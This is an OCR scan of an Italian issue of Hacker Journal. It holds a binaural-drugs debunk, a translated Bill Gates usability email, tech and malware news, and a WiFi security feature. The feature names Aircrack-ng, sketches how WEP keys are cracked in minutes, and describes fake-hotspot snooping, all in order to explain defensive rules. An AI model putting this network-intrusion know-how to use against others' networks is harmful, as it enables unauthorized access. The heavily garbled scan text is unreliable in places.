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hacker (hak'dr) 

'Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione 

e come espandere le loro capacità, a differenza di molti utenti, 

che preferiscono imparare solamente il minimo necessario." 




Nuove droghe, vecchie bufale 



.a musica e un meraviaiioso stupetaa 



derla tropi: 



(1891-1980) 



Direttore Responsabile: 
Teresa Carsaniga 

Copyright 

WLF Publishing S.r.l. è titolare esclusivo di 

tutti i diritti di pubblicazione. Per i diritti di 

riproduzione, l'Editore si dichiara pienamente 

disponibile a regolare eventuali spettanze per 

quelle immagini di cui non sia stato possibile 

reperire la fonte. 

Gli articoli contenuti in Hacker Journal 
hanno scopo prettamente didattico e divul- 
gativo. L'editore declina ogni responsabili- 
tà' circa l'uso improprio delle tecniche che 
vengono descritte al suo interno. 
L'invio di immagini ne autorizza implicita- 
mente la pubblicazizone gratuita su qual- 
siasi pubblicazione anche non della WLF 
Publishing S.r.l. 

Copyright WLF Publishing S.r.l. 

Tutti i contenuti sono Open Source per 

l'uso sul Web. Sono riservati e protetti 

da Copyright per la stampa per evitare 

che qualche concorrente ci freghi il 

succo delle nostre menti per farci 

del business. 



Siamo contro l'uso di sostanze stupefacenti anche se molti di noi fanno abbon- 
dante uso di sostanze psicotrope (tutte quelle sostanze che sono in grado di alte- 
rare il nostro stato di coscienza) come caffè e caffeina (quindi anche le 10 lattine 
di Coca al giorno), tea e sui derivati, le varie Redbull e affini, tabacco, alcol e via 
così. Partendo da questo presupposto vorremmo fare una piccola riflessione su 
una delle notizie che ha imperversato per la rete nell'ultimo periodo, stiamo par- 
lando di i-doser.com e delle sue droghe binaurali. 

Fondamentalmente secondo questo sito e sarebbe possibile indurre il cervel- 
lo a reazioni simile a quelle causate dalle droghe più comuni attraverso l'ascolto 
di determinati suoni. 

Che la musica e i suoni siano in gradi di alterare il nostro umore e addirittura la 
nostra capacità di guarigione è assolutamente assodato e noi stessi ammettiamo 
di fare abbondante uso di Rage Against the Machine o System of a Down per te- 
nerci su durante le notti insonni per finire i numeri della rivista, ma da qua a pen- 
sare che i suoni compresi nella dose (così vengo chiamati i file audio .DRG ven- 
duti nel sito) chiamata Steroids possano davvero farci gonfiare i muscoli onesta- 
mente ce ne passa un bel po'. 

Abbiamo scaricato il software per ascoltare alcune dosi e ci siamo fatti un paio 
di "alchol" e un "orgasm" seguendo le istruzioni per la somministrazione e onesta- 
mente non abbiamo provato nulla che non possa provocarci l'ascolto per 30 minu- 
ti di un mantra buddista nel buio della nostra stanza da letto o una delle sinfonie 
di Rachmaninov (avete presente il film Shine???) insomma lo stordimento c'è do- 
po mezz'ora di suoni a tutto volume sparati nelle orecchie ma non siamo sincera- 
mente convinti che qualsiasi altro suono ci avrebbe dato risultati diversi e comun- 
que il mese scorso a Modena durante il concerto dei RATM, se quelli di i-doser. 
co/?? hanno ragione, eravamo sicuramente tutti strafatti. 



CONTINUA LA CACCIA 




In tanti ci hanno già risposto ma non ci basta mai e vogliamo solo il meglio per le 
nostre pagine e i nostri lettori e quindi continuate a mandare le vostre candida- 
ture alla mail: 



contributors@hackerjournal.it 



HACKER JOURNAL: INTASATE LE NOSTRE CASELLE 



Diteci cosa ne pensate di HJ, siamo tutti raggiungibili via e-mail, tramite lettera o messo 

a cavallo... Vogliamo sapere se siete contenti, critici, incazzati o qualunque altra cosa! 

Appena possiamo rispondiamo a tutti, scrivete! 

redazione@hackerjournaUt 
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SEGURITY UPDATE 



Hi 








T 



ra gli atti del processo Comes vs. Microsoft è stata rinve- 
nuta una mail di Bill Gates che non possiamo non pubblica- 
re e questa volta lasceremo a voi ogni commento anche se 
onestamente ci viene da pensare: Chi la fa, l'aspetti!!! 



Da: Bill Gates 

Inviato: Mercoledì 15 gennaio 2003, 10:05 AM 

A: Jim Allchin 

Ce: Chris Jones (WINDOWS); Bharat Shah (NT); Joe Peterson; Will Poole; 

Brian Valentine; Anoop Gupta (RESEARCH) 

Oggetto: Flame sul degrado sistematico dell'usabilità di Windows 



^ Sono molto deluso di come l'usabilità di 
5>s Windows stia arretrando e i gruppi di ge- 
stione dei programmi non spingano sulle que- 
stioni di usabilità. 

^ Lasciate che vi racconti la mia esperien- 
X za di ieri. 

^ Ho deciso di scaricare (Moviemaker) e 
>< comperare il pacchetto Digital Plus... co- 
sì sono andato a Microsoft.com. Hanno un po- 
sto per i download e ci sono andato. 

^ Le prime 5 volte che ho usato il si- 
>sto, è andato in timeout mentre cerca- 
va di far comparire la pagina di download. 
Poi sono riuscito a farla comparire dopo un 
ritardo di 8 secondi. 

^ Questo sito è così lento da essere inu- 
5*C tilizzabile. 

^ Non era nei primi 5, per cui ho espanso 
5*£gli altri 45. 

^ Questi 45 nomi sono completamente incom- 
5*Sprensibili. Fanno sembrare limpidi nomi 
come C:\Documents and Settings\billg\My Do- 
cuments\My Pictures. 

^ Non sono filtrati dal sistema., e così 
>< molte cose sono strane. 

f Sono andato alla sezione Media. 
?< Ancora niente Moviemaker. Ho digitato 
"movie". Niente. Ho scritto "movie maker". 
Niente. 

^ Così mi sono arreso e ho mandato un e- 
Xmail ad Amir dicendogli: dov'è questo 
download di Moviemaker? Esiste? 

^ Così mi hanno detto che usare la pagi- 
£*v na di download per fare il download di 
qualcosa non era una cosa che avevano pre- 
visto. 

^ Mi hanno detto di andare al pulsante di 
X ricerca della pagina principale e digita- 
re "movie maker" (non 'moviemaker'!). 

^ Ci ho provato. Il sito era pateticamen- 
5>s te lento, ma dopo 6 secondi di attesa è 
comparso. 

^ Ho pensato che a questo punto avrei visto 
7<t sicuramente un pulsante per andare sem- 
plicemente a fare il download. 

^ In realtà è più come un rompicapo da rì- 
•ssolvere. Mi ha detto di andare a Windows 
Update e fare un sacco di incantesimi. 



^ Questo mi è sembrato completamente stra- 
Ano. Perché dovrei andare da un'altra par- 
te e fare una scansione per scaricare Mo- 
viemaker? 

^ Così sono andato a Windows update. Win- 
>< dows Update decide che devo scaricare un 
sacco di controlli. Non una sola volta, ma 
più volte, durante le quali vedo delle fi- 
nestre di dialogo misteriose. 

^ Ma Windows Update non conosce qualche 
•s chiave per comunicare con Windows? 

^ Poi ho fatto la scansione. Ci ha messo un 
><bel po' e mi ha detto che era indispensa- 
bile che io scaricassi 17 mega di roba. 

^ Questo dopo che mi era stato detto che 
>C stavamo facendo delle patch di delta, ma 
invece per prendere soltanto 6 cose che sono 
etichettate nel modo più INQUIETANTE possi- 
bile ho dovuto scaricare 17 mega. 

^ Così ho fatto il download. Questa parte è 
5*S stata veloce. Poi voleva fare un'instal- 
lazione. Ci ha messo sei minuti e la mac- 
china era così lenta che non potevo usarla 
per fare altro nel frattempo. 

^ Cosa diavolo sta succedendo in quei sei 
5*v minuti? E' folle. Questo avviene dopo che 
è finito il download. 

^ Poi mi ha detto di riavviare la mia mac- 
?% china. Perché dovrei farlo? Riavvio ogni 
sera, perché dovrei farlo in quel momento? 

$ Così ho fatto il reboot, perché INSISTE- 
XvA. Ovviamente questo significava sba- 
razzarmi completamente della mia situazio- 
ne in Outlook. 

^ Così sono ripartito e sono tornato da Win- 
7< dows Update. Mi sono dimenticato del mo- 
tivo per cui ero in Windows Update, dato che 
volevo soltanto ottenere Moviemaker. 

^ Così sono tornato a Microsoft.com e ho 
?< guardato le istruzioni. Devo cliccare su 
una cartella chiamata WindowsXP. Perché do- 
vrei farlo? Windows Update sa benissimo che 
sto usando Windows XP. 

^ Cosa significa dover cliccare su quella 
?< cartella? Così ottengo un mucchio di cose 
che mi confondono, ma ecco che una di es- 
se è Moviemaker. 

^ Così eseguo lo scaricamento. E' veloce, 
•s ma il programma d'installazione richie- 
de molti minuti. E' sorprendente quanto sia 
lenta questa cosa. 



^ A un certo punto mi viene detto che devo 
>< andare a prendere Windows Media Series 9 
per scaricarlo. 

^ Così decido che andrò a farlo. Stavolta 
X ottengo finestre di dialogo che dicono 
cose tipo "Apri" o "Salva". Nelle istruzioni 
non c'è alcuna guida su quale scegliere. Non 
ho la più pallida idea di quale fare. 

^ Lo scaricamento è veloce e l'installazione 
>< richiede 7 minuti per questa cosa. 

^ Così adesso mi aspetto di avere Movie- 
>< maker. Vado al mio Aggiungi/Rimuovi pro- 
grammi per assicurarmi che ci sia. 

9 Non c'è. 

^ Cosa c'è, invece? La seguente spazzatu- 
><ra: Microsoft Autoupdate Exclusive test 
package, Microsoft Autoupdate Reboot test 
package, Microsoft Autoupdate testpackagel. 
Microsoft AUtoupdate testpackage2, Microsoft 
Autoupdate Test package3. 

^ Qualcuno ha deciso di scassare l'uni- 
•< ca parte di Windows che era usabile? Il 
file system non è più usabile. Il registro 
non è usabile. Quest'elenco di programmi era 
uno dei pochi luoghi sani di mente ma ora 
è un letamaio. 

$ Ma questo è soltanto l'inizio del letame. 
>< Dopo mi trovo elencate cose come "Win- 
dows XP Hotfix vedi Q329048 per ulteriori 
informazioni". Cos'è "Q329048"? Perché que- 
ste serie di patch sono elencate qui? Alcu- 
ne delle patch [dicono] semplicemente cose 
tipo "Q810655" invece di dire "vedi Q329048 
per ulteriori informazioni". 



X 



Che pasticcio totale. 
> Moviemaker non c'è proprio. 



X 

^ Così rinuncio a Moviemaker e decido di 
^scaricare il Digital Plus Package. 

^ Mi viene detto che devo immettere un sac- 
>< co di informazioni che mi riguardano. 

^ Le immetto tutte, e dato che il sistema 
5>< decide che ho sbagliato a scrivere qual- 
cosa, devo riprovare. Ovviamente ha pur- 
gato la maggior parte di quello che ave- 
vo già scritto. 

^ Provo [a digitare] i dati giusti 5 volte e 
X continua semplicemente a purgarmi le co- 
se e a chiedermi di riscriverle. 

^ Così dopo più di un'ora di delirio e di 
5>% trasformazione in spazzatura del mio 
elenco di programmi e dopo essere stato spa- 
ventato e aver visto che Micro- 
soft, com è un sito terribile, non 
sono riuscito a far andare Movie- 
maker e non ho ottenuto il pac- 
chetto plus. 

^ La mancanza d'attenzione per l'usabilità 
>< rappresentata da queste esperienze rasen- 
ta l'inimmaginabile. Pensavo avessimo rag- 
giunto un record negativo con i luoghi di 
Windows Network o con i messaggi che otten- 
go quando cerco di usare 1' 802. 11 (non è ado- 
rabile quel messaggio riguardante il root 
certificate?) . 

^ Quando riuscirò finalmente a usare que- 
X sta roba, sono sicuro che avrò ulterio- 
re feedback. ■ 



[ p 3 ]_[ www.hackerjournal.it ] 



03_hj 156_sec . indd 



<$> 



9-07-2008 



11:57:29 




















a NEWS 




TRANS PC-MAC 



E arrivato, per ora solo a Taiwan e in 
Bulgaria ma presto anche in tutta 
Europa, il fantastico EFiX, un piccolo 
dispositivo da installare sul proprio 
PC che si collega ai Pin di qualsiasi 
porta USB e che ti permette di instal- 
lare il sistema operativo OS X usan- 
do addirittura i DVD originali Apple. 
EFiX deve il suo nome all'Extensible Fir- 
mware Interface (EFI), che come noto 
è l'unico tipo di firmware nativamente 
supportato da Mac OS X. Attualmente 
supporta un numero limitato di schede 
madri Intel-based, peraltro tutte mar- 
chiate Gigabyte, ma rimane comun- 
que un bel passo avanti per tutti colo- 
ro che amano il meglio e l'intercambiale 
su ogni hardware o software senza per 
forza concedersi interamente a marche 
ormai conosciute. 



LA UNI 



arche zfl 



ono molti anni ormai che 

la Comunità Europea cerca 
di controllare le società nazio- 
nali di raccolta del diritto d'au- 
tore. Ed ora sembra aver per- X t 
so davvero la pazienza. La Di- ■ * ■ 
rezione sta pensando di entrare ,»- 
a piede teso sulle società, co- j£ 
me la SIAE iatliana, con pesan- ;"<■ 
ti sanzioni antitrust. In realtà la ^V-*, 
UE vorrebbe costituire un regi- 
me di libera concorrenza tra le : ^ 

società di raccolta in modo da I i' 

poter ridurre il settore che og- 
gi è ormai saturo. Questo però spaventa molto le case che controllano le li- 
cenza sulla musica perché creerebbero un far west nella corsa al ribasso del 
prezzo. Questo potrebbe comportare due cose. La prima è la chiusura di mol- 
te case di controllo dei diritti d'autore, in particolar modo di quelle più picco- 
le. Il secondo è che potremmo arrivare ad un rischioso "prezzo tavolino" che 
imporrebbe un duro muro dei prezzi nel mercato europeo. 



» r* 1 



.: **'■ 






{ 



IL PRIMO BUG 



FIREFOX 3 



A poche ore dal ri- 
lascio è già stata 
scoperta una falla de- 
finita critica. Mozilla è 
già al lavoro su una pa- 
tch. Non è però un pro- 
blema della nuova ver- 
sione ma una cosa che 
è scappata già nella ver- 




sione precedente. 
Non è il caso di allarmar- 
si però, la sicurity team 
di Mozzilla è già all'ope- 
ra per risolvere il proble- 
ma. 

Questo bug richiede l'in- 
terazione dell'utente, che 
deve cliccare su un link 
sospetto o visitare una 
pagina pericolosa, quindi 
se non siamo proprio de- 
gli sprovveduti ce la pos- 
siamo ancora fare! ;) 



Il GAFFE VIA INTERNET 

Vuoi prepararti il tuo caffè o thè di- 
rettamente dall'ufficio? Conside- 
rato che una connessione internet oggi 
si trova ovunque basterebbe solo colle- 
gare la macchina del caffé ad una con- 
nessione ADSL e il gioco sarebbe fat- 
to. Per i meno pratici del fai-da-te, in- 
vece, posso acquistare per la bellezza di 
1.200 euro la Jura Impressa F90, mac- 
china da caffé dotata di Connectivity 
Kit. Tramite un cavo Ethernet la si può 
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HOT NEWS 



STESI DA UNA HI] UNUM fUVM\ 



Si chiamerà DUdE, che sta per DUal- 
mode Detector Ensemble, ed offri- 
rà alle forze armate USA un'arma in più 
contro i "cattivi". Si tratta di un dispo- 
sitivo, installato sui fucili americani, che 
permetterà di mirare con altissima preci- 
sione sia in mancanza di luce sia in man- 
canza di calore. 

La novità in realtà arriva dalla fantascien- 
tifica idea di qualche anno fa delle micron- 
de sonore che ormai ha preso piede nella 
realtà e verrà montata sulle armi che poi 
saranno in grado di atterrire e stordire in 
maniera efficace intere schiere di fuolli ri- 
belli. Che siano terroristi o semplici tifosi 
un po' allegroni poi questo non ha molta 
importanza visto che le armi che andran- 
no in dotazione all'esercito USA potrebbe- 
ro arrivare anche alla polizia di stato di al- 
cune città europee per l'utilizzo in manife- 
stazioni "pericolose" o negli stadi. 





STARMAC, acronimo che sta per 
Stanford Testbed of Autonomous 
Rotorcraft for Multi-Agent Control, ar- 
riva dall'unità Hybrid Systems Labora- 
tory della Stanford University ed è un 
drone serve per sperimentare le solu- 
zioni automotive finora individuate dai 
"labs" della California e per "dimo- 
strare nuovi concetti nel controllo mul- 
ti-fattore in una piattaforma nel mon- 
do reale". 

STARMAC vola grazie ai quattro rotori di 
cui è dotato, e ritorna in posizione se gli 
viene lanciato qualcosa contro facendolo 
spostare. Attualmente sono stati costrui- 
ti 6 modelli del drone, una vera e propria 
flotta i cui componenti integrano al pro- 
prio interno microcontroller di basso li- 
vello, single-board computer PXA270 e il 
minuscolo PC-104 con Linux Fedora in- 
corporato per il data processing delle in- 
formazioni visive catturate dai sensori. 



/KMEMDKW 




2.000 portatili persi negli ae- 
_ roporti USA ogni settimana. 

Questo è quanto emerso da uno 
studio di Dell e Ponemon Institu- 
te, secondo il quale l'utenza busi- 
ness è talmente indaffarata e gra- 
vata durante le operazioni di check- 
in da "dimenticare" quello che per 
molti pure costituisce lo strumen- 
to di lavoro più importante. Lo stu- 
dio ha compreso 106 aeroporti su 
territorio statunitense nel quale so- 
no stati intervistati 800 viaggiatori 
di business class. E di tutti questi 
fantastici portatili solo il 30% viene 
poi aliatine recuperato. In molti casi 
è emerso che questi laptop non si 
sono mai più trovati in aeroporto e 
in molti altri casi non sono mai sta- 
ti richiesti indietro, tante che alcuni 
aeroporti hanno pensato di metter- 
li in un asta di beneficenza. 







collegare al Pc 
e, attraverso 
di questo, a 
Internet. 
Attenzione 
però ai ri- 
schi, infat- 
ti questa fan- 
tastica macchina 
non presenta alcuna protezione con- 
tro virus & C. e se è collegata alla rete 
di casa potrebbe causare grosse pro- 
blematiche, tipo fare da accesso al pro- 
prio PC. 




feéCjKa^é dirotta èie ilfBSI. 



i chiama DnsCham 

'nella Rete. Le sue viti... 
malware è modificare i Dns il sistema che trasforma gli indirizzi mnemonici 
in indirizzi numerici per ridirigerli a un server malevolo. In questo modo ogni 
computer connesso rischia di essere dirottato verso siti contenenti malware 
o pagine che assomigliano a quelle originali ma sono state create a scopo 
di phishing. Se si è colpiti, anche i nomi di dominio che non esistono ver- 
ranno risolti facendo puntare il browser verso pagine pericolose. 
La buona notizia è che DnsChanger è in grado di sfruttare solo alcune in- 
terfacce web ma stiamoci comunque attenti. 
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GOOGLE FUORILEGGE? 



I BLDGGEB 

Il governo iraniano infuria contro i 
blogger che infestano la rete ma 
in realtà prende in un solo lazzo an- 
che tanta brava gente. 

Così recita l'ultimo consiglio di stato: 
"Una delle responsabilità più impor- 
tanti per lo stato è garantire la sicu- 
rezza sociale e mentale nella società 
sfortunatamente, riferiscono le auto- 
rità responsabili, alcuni criminali sot- 
traggono alle persone la possibilità di 
vivere sicuri. Fra questi criminali, fra 
coloro che commettono violenze ses- 
suali e coloro che conducono rapine a 
mano armata, ci sono anche i blogger 
e i netizen che sfruttano la rete come 
un canale per levare la propria voce, 
per raccontare l'Iran ad altri paesi, 
per scuotere le coscienze dei propri 
concittadini. Agire in rete non è un'at- 
tenuante." Tutto questo per poi intro- 
durre la pena di morte anche per chi 
agisce nel web. Ma forse non dovreb- 
bero toglirla dalla relatà? 



\ 



DOE TROJAN PER MAC 



SecureMac ha dichiarato che cir- 
colano a piede libero due trojan 
in grado di creare problemi agli uten 
ti Macintosh. I due virus entrano dalla 
porta lasciata aperta dal Apple Remo- 
te Desktop Agent e poi si installano sul- 
la cartella Applicazioni in maniera invisibi- 
le per infettare i nostri computer. 
AppleScript THT si presenta con nomi co- 
me "ASthtv05" o "ASthtv06" e acquisisce 
privilegi di amministrazione per poi memo- 



utti noi sappiamo che da tempo è ' 

possibile, su Google Maps, ricer- 
care le porprie città alcune si posso- 
no visitare in versione satellitare fino 
all'ultimo dettaglio e altre meno. Da 
qualche tempo è sorta anche la versio- 
ne stradale. Cioè una versione, gratuita 
sul sito, che ti permette di posizionarsi 
su di una strada e di poterla visionare a 
360° direttamente da terra. Tutto questo è stato possibile grazie alle nume- 
rose e costose riprese che Google effettua con delle autovetture nelle stra- 
de della nostra città. Ed è proprio di quest'ultima parte che si è preoccupato 
il Regno Unito. Infatti la Privacy International dichiara che i volti dei cittadi- 
ni non possono essere impunemente catturati e sbattuti online: non per fini 
commerciali come quelli perseguiti da Google, non senza che venga chiesto 
il loro consenso. Ci aranno sanzioni? 




VIA IL PC, DENTRO 



lex Springer, celebre editore attivo in 30 paesi, che pro- 
duce più di 150 pubblicazioni e impiega 10mila persone 
o poco più, ha deciso di abbandonare la piattaforma PC Win- 
dows e abbracciare la proposta Apple. Mathias Dòpfner, CEO 
della società, ha spiegato che si tratta di una operazione dovuta 
ad alcuni elementi ineludibili: molto del lavoro grafico dell'azien- 
da viene già svolto sui Mac e allo stesso tempo il Mac viene ri- 
tenuta una piattaforma più amichevole e accessibile. Nelle mo- 
tivazioni si parla però anche di eleganza e del fatto che rispetto 
al passato oggi i computer Mac costino meno, e siano meno onerosi anche in termini 
di manutenzione. Il passaggio, secondo quanto riferito da Heise Online, riguarda l'in- 
tero parco macchine usato dall'azienda. 




rizzare le paro- 
le digitate sul- 
la tastiera, at- 
tivare la con- 
divisione dei 
file, lancia- 
re coman- 
di, fare screenshot 
e foto attraverso la videocamera. 
Pokergame, invece, si connette a un ser- 
ver al quale comunica indirizzo IP, login e 
password del malcapitato. Una combina- 
zione perfetta per essere uniti nello scopo 
in maniera separata. 



EX DIRETTRICE 
DIGTROCCE IL REPARTO IT 

Danielle Duann è stata condannata a 
10 anni di prigione e a pagare una 
multa di 250.000 dollari per aver can- 
cellato gli archivi elettronici del LifeGift 
Organ Donation Center di Houston, ban- 
ca degli organi, non si tratterebbe del- 
l'azione distruttrice di un pirata infor- 
matico, ma la vendetta di un'ex direttri- 
ce del dipartimento It, eseguita dopo il 
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HOT NEWS 




IMlilffl RA 14 ANNI RICATTATA DA EUffl fNTFOLl 



Sono passati quattordici anni dal'omi- 
cidio di Liliana Grimaldi, un caso ri- 
masto insoluto, ma ora gli inquirenti ria- 
prono il caso. La chiave di tutto sarebbe 
AFIS, il sistema informatico di identifica- 
zione delle impronte, infatti ha consenti- 
to di comparare le impronte raccolte dal- 
la scientifica sul luogo del delitto nel 1994 
con quelle contenute nei database del Mini- 
stero degli Interni. In questo modo gli agen- 
ti sono riusciti a individuare un uomo, H.M, 
che all'epoca aveva 17 anni. Stando alle ri- 
costruzioni degli inquirenti, l'uomo avreb- 
be fatto parte di una banda che era riusci- 
ta ad effettuare numerose rapine in casa di 
anziani dopo averne conquistato la fiducia 
ed essersi fatto aprire la porta. La domanda 
ora è: "ma com'è che in TV i riconoscimenti 
li riescono a fare in qualche gioro e qui noi 
ci mettiamo quattordici anni? 



Siete mai stato ricattati da un virus? 
No?! 
Beh ecco quello che racconta Kaspersky. 
Purtroppo ci sono in giro negli ultimi pe- 
riodi degli acerrimi nemici che non si limi- 
tano più a farci danni al nostro computer o 
a sottrarci dati personali. Ora ce li chiude 
con una chiave di cifratura a 1024 bit e se 
volete riaverli dovete pagare il programma- 
tore del virus. 

Il virus si fa riconoscere perché aggiunge 
l'estensione "._CRYPT" in fondo all'esten- 
sione preesistente dei file che ha lucchet- 
tato e poi colloca nella medesima cartella/ 
directory un file "l_READ_ME_l.txt" che 
spiega come procedere per far avere il ri- 
scatto. Beh, per lo meno nel ventesimo se- 
colo non ti spaventano più con le pistole! 




NOSTRA CANE 



~ er gli amanti dei cani è arriva- 
to Pet's Eye View. 

Una fotocamera digitale che si può 
attaccare al collare del nostro amico 
a quattro zampe. È capace di scat- 
tare immagini ad una risoluzione di 
640x480 pixel e si può temporizza- 
re lo scatto fotografico con intervalli 
da un minuto a quindici minuti. 
Le immagini sono scaricabili 
tramite la presa USB, con la quale è 
dotato l'apparecchio, e quindi avrete 
la possibilità di scoprire i movimenti 
del vostro cucciolo o semplicemen- 
te di scoprire dove vi nasconde tutte 
le scarpe che non trovate! Ha un co- 
sto di 50 dollari e 
scatta un nume- / 
ro massimo di 35 / 
immagini. Non è / 
ancora in com- / 
mercio quello / 
con la memo- / 
ria espandibile / 
ma sarà pre- 1 
sto anche sul / 
nostro mer- / 
cato. / 




QjP 



| 



licenziamento. Fortunatamente i dati so- 
no stati recuperati dal backup. La donna 
era stata licenziata poco prima. La vi- 
cenda risale a tre anni fa ma la condan- 
na è arrivata solo ora. 




MAZZINI, 



VELOCIZZIAMO IL NOSTRO LAVORO QUOTIDIANO 



La vita iper-frenetica, con la qua- 
le molti di noi devono fare i con- 
ti ogni giorno, riesce a trasformare 
anche il computer in un qualcosa di 
troppo lento, da sveltire il più pos- 
sibile. 

Allo scopo, come ben saprete, sono 
disponibili le comodissime scorciatoie 
da tastiera, che, in quasi ogni softwa- 
re moderno permettono di accedere, 
in men che non si dica, a funzionalità 



e schermate specifiche. Parenti stret- 
te di queste scorciatoie, sono le mou- 
se gestures, che, sfruttando lo stes- 
so concetto pensato per le combina- 
zioni di tasti, permettono di compie- 
re le azioni più comuni con la sempli- 
ce attuazione di determinati movimen- 
ti con il cursore del mouse. Ed allora, 
che ne dite di applicare quest'altro, ot- 
timo strumento di lavoro a tutto il si- 
stema operativo? 
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i 



nostro vicino può assumere 
I controllo del nostro com- 
puter in pochi minuti. 



■E! gì 



Hill?l»nr 



Digitando le parole chiave "crac- 
ker" e "WiFi" su Google, troveremo nu- 
merosi tutorial che spiegano come si 



j HAtìKf r m L 

PASSIONE 



,erchévi date alla pirateria? 

Kevin 
"La mia amica ha un box che utilizza 
il filtro MAC e la chiave WEP. Abita in 
un condominio e le ho detto che il suo 
punto di accesso non era abbastanza 
sicuro, che rischiava di farsi rubare il 
segnale da chiunque. Per dimostrar- 
glielo ho deciso di piratarle il segna- 
le. Ci ho messo 10 minuti a violare la 
sua rete. E ho qualcosa da dire a tut- 
ti i dilettanti che tentano di violare le 
reti WiFi: non dimenticate che è ille- 
gale. Per alcuni può essere un gioco 
ma prima di tutto è un reato". 
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b intercettare un segnale WiFi pro- 
to e navigare in rete gratuitamente. 
5 reti WiFi sono il bersaglio preferito 
degli hacker dilettanti: il rischio di es- 



di navigare gratis è decuplicato. Alcui 
pirati si limitano a divertirsi, altri mira 
no realmente ad attentare alla privacy 
dei proprietari delle reti WiFi. Non di 
mentichiamo che tutti i nostri dati son< 
vulnerabili: numero di carta di credit*" 



documenti i 
lavoro ~ : 



magini personali sono potenzialmen- 
te accessibili a chiunque intercetti il 
nostro segnale. 



:: Addio chiave WE 

All'apparire dei primi attacchi con- 
tro i segnali WiFi, la risposta dei 
provider è stata quella di forni- 
re una protezione tramite chia- 
ve wep. l!Gf Sraz 
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LE 5 REGOLE I ORO PER PROTEGGERE LÀ NOSTRA RETE 



1 FILTRARE GLI INDIRIZZI MAC 

L'indirizzo "MAC" è l'indirizzo fisico del 
nostro computer, che equivale al suo 
codice genetico. Possiamo ordinare al 
nostro router o al nostro box di accet- 
tare esclusivamente le connessioni che 
provengono da computer selezionati. 
Attenzione: sebbene efficace, questo 
metodo servirà solo a rallentare i pirati 
più temerari; non dimentichiamo quin- 
di di seguire le altre regole. 

2 UN IP FISSO 

Il nostro punto d'accesso WiFi ci as- 
segna automaticamente un indirizzo 
IP a ogni connessione. Questa opera- 
zione viene generalmente effettuata in 
modo dinamico e invisibile all'utente. 
Il problema è che consente a chiunque 
di procurarsi un indirizzo IP. Privilegia- 
mo dunque l'assegnazione manuale di 
indirizzi IP fissi, allo scopo di control- 
lare le nuove connessioni. 

3 PASSARE ALLE CHIAVI WPA2 

Non esistono chiavi inviolabili ma 



proteggere la propria rete con una chia- 
ve WEP equivale a non proteggerla af- 
fatto. Il metodo per violare una chia- 
ve WPA è molto più complicato e, se 
l'utente utilizza una serie di oltre ven- 
ti caratteri, si trasforma in un vero in- 
cubo per i pirati. Facciamo attenzio- 
ne tuttavia a inserire manualmente la 
chiave in modo corretto e a non utiliz- 
zare quelle generate automaticamente. 
In rete circolano dizionari di chiavi che 
facilitano il compito agli hacker. 

4 MODIFICARE SPESSO LA CHIAVE 

Per violare la nostra rete, i pirati utiliz- 
zano programmi che "ascoltano" le co- 
municazioni tra il nostro computer e il 
nostro punto d'accesso. Più informa- 
zioni intercettano, più risulta veloce la 
decifrazione della chiave. In parole po- 
vere: se scarichiamo molto materia- 
le, modifichiamo la nostra chiave ogni 
settimana, mentre se ci colleghiamo a 
Internet solo per leggere la posta elet- 
tronica e prenotare i biglietti ferroviari 
potremo permetterci di sostituirla una 



bastano 10 minuti per violarla. 



chiave di questo ti, 
verse ore ~ 
10 minuti, 
tecnologie 
criptazione si 
sono fortuna- 
tamente evo- 
lute con la dif- 
fusione delle chia\ 
tutti gli ultimi "box 
pei. Anche le tecniche di pirateria, 
via, hanno fatto grandi 
ssi avanti. Purtroppo, 
:oraoggi, numero- 
^ nrotezioni sono 
tipo WEP. Per 
rendersene con- 
to è sufficien- 
te avviare il no- 
stro programma 
I di connessio- 
' ne. Verifichia- 

mo noi stessi se 
k nostra rete è 
tetta da una 



utilizzano 



relativamente tran- 
elli. Se però 
zziamo una 
hiave WEP, an- 
che un dilettan- 
te intelligente po- 
trebbe violare la 
nostra connes- 
so. Questi pirati del- 
jtilizzano nella mag- 
gior parte dei casi il pacchetto "Air- 
crack-ng" per raggiungere i propri 
obiettivi. 

La procedura è riservata a chi di- 
spone di buone conoscenze infor- 
matiche ma non certo ai soli profes- 
sionisti. Una volta regolati corretta- 
mente i parametri, il pacchetto Air- 
crack-ng impiega solo 10 minuti per 
recuperare i dati identificativi WEP di 
una connessione WiFi criptata a 256 
bit. Il principio è il seguente: il com- 
puter del pirata invia grandi quan- 
tità di richieste specifiche a quello 



> * > * 



volta al mese. Per modificare i nostri 
dati identificativi di connessione WiFi, 
colleghiamoci con il sistema di gestio- 
ne dell'account indicato dal nostro for- 
nitore di accesso a Internet (consultia- 
mo la documentazione del provider). 
Modifichiamo anche il nome della no- 
stra rete adottando una denominazio- 
ne universale, in modo che i pirati non 
possano sapere che provider utilizzia- 
mo. In questo modo renderemo loro la 
vita decisamente più difficile. 

5 NASCONDERE L'SSID 

L'SSID (Service Set Identifier) è l'iden- 
tificativo della nostra connessione. 
Serve a riconoscere il nostro punto 
d'accesso o la nostra connessione, a 
seconda del sistema adottato. I box 
generano l'SSID automaticamente ma 
possiamo attivare un'opzione che lo 
nasconde. Se questa protezione non 
basterà a fermare i pirati più abili, ser- 
virà comunque a rallentarli e forse sco- 
raggerà i dilettanti che tenteranno di 
violare il nostro punto d'accesso. 



senza cavo non si stabilisce, ale. 



J Hacker per 

PASSIONE I 



jerche vi date alla pirateria? 
_ Anonimo 

"È ipocrita dire che è illegale. Le 
onde WiFi che penetrano a tradi- 
mento in casa mia con la stessa 
frequenza delle micro-onde sono 
forse legali? Molte scuole, biblio- 
teche e luoghi pubblici si sono op- 
posti al WiFi a titolo di precauzio- 
ne. Per il momento, anche se non 
voglio utilizzare WiFi a casa mia, 
ho comunque sette reti differenti 
all'interno del mio appartamento... 
Dunque, se queste reti WiFi entrano 
in casa mia, perché non dovrei ave- 
re il diritto di utilizzarle?" 
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I FALSI HotSpot 
GRATUTITI 



uesto metodo non mira a 

piratare la nostra ban- 
da passante per approfit- 
tare gratuitamente del- 
la nostra connessione a 
Internet. L'obietti- 
vo è di sorve- ^ 
gliare la no- ( 
stra naviga- 
zione sul Web 
(spionaggio o 
sottrazione di 
dati sensibili, co- 
me i dati bancari). 
Gli aeroporti, i centri 
commerciali e i cen- 
tri finanziari sono par- 
ticolarmente presi di mira 
ma nulla impedisce al nostro vicino 
di casa di fare lo stesso. Invece di 
penetrare la nostra rete, l'hacker ci 
attira sulla sua. Il principio è sem- 
plice: noi crediamo di connetterci 
a un hotspot gratuito, invece è uno 
specchietto per le allodole. Dal can- 
to suo, il pirata è collegato a una re- 
te esistente e trasforma il suo com- 
